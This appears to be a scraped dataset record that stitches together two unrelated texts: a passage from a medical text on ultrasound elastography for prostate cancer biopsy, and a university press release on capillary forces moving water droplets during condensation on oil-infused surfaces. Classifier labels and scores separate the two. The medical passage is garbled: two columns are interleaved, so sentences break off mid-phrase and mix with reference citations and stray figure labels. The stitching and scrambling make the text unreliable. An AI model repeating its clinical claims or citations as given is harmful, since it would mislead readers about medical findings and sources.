several different ways: imaging before biopsies are performed and Ophir J, Cespedes I, Ponnekanti H, Yazdi Y, Li X. 1) There is a group of patients who have rising all patients have ultrasound-guided systematic Elastography. A quantitative method for imaging serum PSA levels and who have had two or biopsies by the current standard technique, the elasticity of biological tissues. more negative sets of biopsies. In these cases plus targeted biopsies of elastography-detected Ultrasonic Imaging 1991;13:111. it is likely that a tumour has been missed, lesions, this might increase positivity rates. Rubens DJ, Hadley MA, Alam SK, Gao L, Mayer RD, possibly because it is in an unusual position 4) Elastography possibly assesses the size of Parker KJ. Sonoelasticity imaging of prostate such as the anterior part of the gland. Current tumours and the likelihood of extraprostatic cancer: in vivo results. Radiology 1995;379-383. practice therefore is to perform “saturation” spread. Since greyscale ultrasound is not Lorenz A, Ermert H, Sommerfield HJ, biopsies: about 20 biopsies are obtained suited for this task, MRI is often used but is Garcia-Schurman M, SengeT, Phillipou S. including the anterior gland. This usually not the ideal solution either. In addition, more Ultrasound elastography of the prostate. requires sedation or general anaesthetic. aggressive tumours may have a different A new technique for tumour detection. An alternative approach may be to look for the elastography pattern than less aggressive Ultraschall In Der Medizin 2000;21(1):8-13. tumour using elastography. If found, it could tumours – very valuable information when Cochlin DLl, Ganatra RH, Griffiths DFR. be biopsied with far fewer cores under local assessing treatment options. Both these Elastography in the detection of prostate cancer. anaesthesia. possibilities need to be tested. Clinical Radiology 2002; 57:1014-1020. 2) If elastography imaging is added to grayscale Pallwein L, Aigner F, Faschingbauer R, et al. imaging before biopsies are performed and a Prostate cancer diagnosis: value of real-time definite tumour is detected, then limited b iopsies elastography. of the tumour may be all that is n ecessary. If no Abdom Imaging 2008 Pallwein L, Mitterberger M, tumour is detected, systematic biopsies will still Struve P, et al. Real time elastography in detecting be necessary. Thus elastography could reduce the prostate cancer: preliminary experience. number of biopsies in a certain group of patients. BJU Int 2007;100:42-46.
Fig. 3.1 a Fig. 3.1 b Fig. 3.2 a Fig. 3.2 b Fig. 5.1 a Fig. 5.1 b
Fig. 3.1 c Fig. 3.1 d Fig. 4.1 a Fig. 4.1 b Fig. 5.2 a Fig. 5.2 b
|
__label__pos
| 0.876653
|
What appeared to be erratic movement of water droplets in LIS dropwise condensation is the result of capillary forces
Condensation might ruin a wood coffee table or fog up glasses when entering a warm building on a winter day, but it’s not all inconveniences; the condensation and evaporation cycle has important applications.
New research from the McKelvey School of Engineering reveals the way in which small water droplets move in the area of influence of a larger droplet on a liquid infused surface. (Image: Weisensee lab)
Water can be harvested from “thin air,” or separated from salt in desalination plants by way of condensation. Due to the fact condensing droplets take heat with them when they evaporate, it’s also part of the cooling process in the industrial and high-powered computing arenas. Yet when researchers took a look at the newest method of condensation, they saw something strange: When a special type of surface is covered in a thin layer of oil, condensed water droplets seemed to be randomly flying across the surface at high velocities, merging with larger droplets, in patterns not caused by gravity.
“They’re so far apart, in terms of their own, relative dimensions” — the droplets have a diameter smaller than 50 micrometers — “and yet they’re getting pulled, and moving at really high velocities,” said Patricia Weisensee, assistant professor of mechanical engineering & materials science in the McKelvey School of Engineering at Washington University in St. Louis.
“They’re all moving toward the bigger droplets at speeds of up to 1 mm per second.”
Weisensee and Jianxing Sun, a PhD candidate in her lab, have determined that the seemingly-erratic movement is the result of unbalanced capillary forces acting on the droplets. They also found that the droplets’ speed is a function of the oil’s viscosity and the size of the droplets, which means droplet speed is something that can be controlled.
Their results were published online in Soft Matter.
‘Why are they moving?’
In the most common type of condensation in industry, water vapor condenses to form a thick layer of liquid on a surface. This method is known as “filmwise” condensation. But another method has been shown to be more efficient at promoting condensation and the transfer of heat that comes along with it: dropwise condensation.
It has been used on traditionally hydrophobic surfaces — those that repel water such as the Teflon coating on a non-stick pan. However, these traditional non-wetting surfaces degrade rapidly when exposed to hot vapor. Instead, a few years ago, researchers discovered that infusing a rough or porous hydrophobic surface with a lubricant, such as oil leads to faster condensation. Importantly, these lubricant-infused surfaces (LIS) led to the formation of highly mobile and smaller water droplets, which are responsible for most of the heat transfer when it comes to condensation and evaporation.
During the process, however, the movement of water droplets on the surface seemed erratic — and fast. “They move at a really high velocity for their size,” — about 100 microns —”just by sitting there,” Weisensee said.
“The question is, ‘Why are they moving?’ ”
Using high-speed microscopy and interferometry to watch the process play out, Weisensee and her team were able to discern what was happening and the relationships between droplet size, speed and oil viscosity.
They created water vapor and watched as small droplets formed on the surface. “The first process is that small droplets coalesce and form bigger droplets,” Weisensee said. Capillary forces cause the oil to grow up and over the droplets, forming a meniscus — not the knee muscle, but rather a curved layer of oil surrounding the droplet.
The oil is continuously moving around, trying to strike a balance as it covers different-sized droplets in different places on the surface — if a large droplet forms here, the meniscus stretches over it, causing the oil layer to contract somewhere else. Any smaller droplets in the area of contraction are swiftly pulled to the larger droplets, leading to oil-rich and oil-poor regions.
During the process, larger droplets are essentially clearing the space, which in turn makes room for the formation of more small droplets.
Since most of the heat transfer (about 85 percent) occurs via these small droplets, using LIS for dropwise condensation should be a more efficient way to disperse of heat and get water from vapor. And since the droplets are very small, less than 100 microns in diameter, condensation can occur in a smaller area.
There’s another benefit, too. During “traditional” condensation, gravity is the force that clears water from the surface, making room for new droplets to form. The surface is placed vertically, and the water simply runs off. Since capillary forces are doing the work in dropwise condensation on liquid-infused surfaces, however, the orientation of the surface is of no consequence.
“It could potentially be used on personal devices,” where orientation is constantly changing, she said, “or in space.” And because the entire process is more efficient than traditional condensation, Weisensee said, “This might be a nice way of clearing up space without having to rely on gravity.”
Going forward, Weisensee’s team will measure heat transfer to determine if the smaller droplets during dropwise condensation on LIS are, in fact, more efficient. They also plan to investigate different surfaces in order to maximize droplet movement.
The McKelvey School of Engineering at Washington University in St. Louis focuses intellectual efforts through a new convergence paradigm and builds on strengths, particularly as applied to medicine and health, energy and environment, entrepreneurship and security. With 96.5 tenured/tenure-track and 33 additional full-time faculty, 1,300 undergraduate students, 1,200 graduate students and 20,000 alumni, we are working to leverage our partnerships with academic and industry partners — across disciplines and across the world — to contribute to solving the greatest global challenges of the 21st century.
|
__label__pos
| 0.826911
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.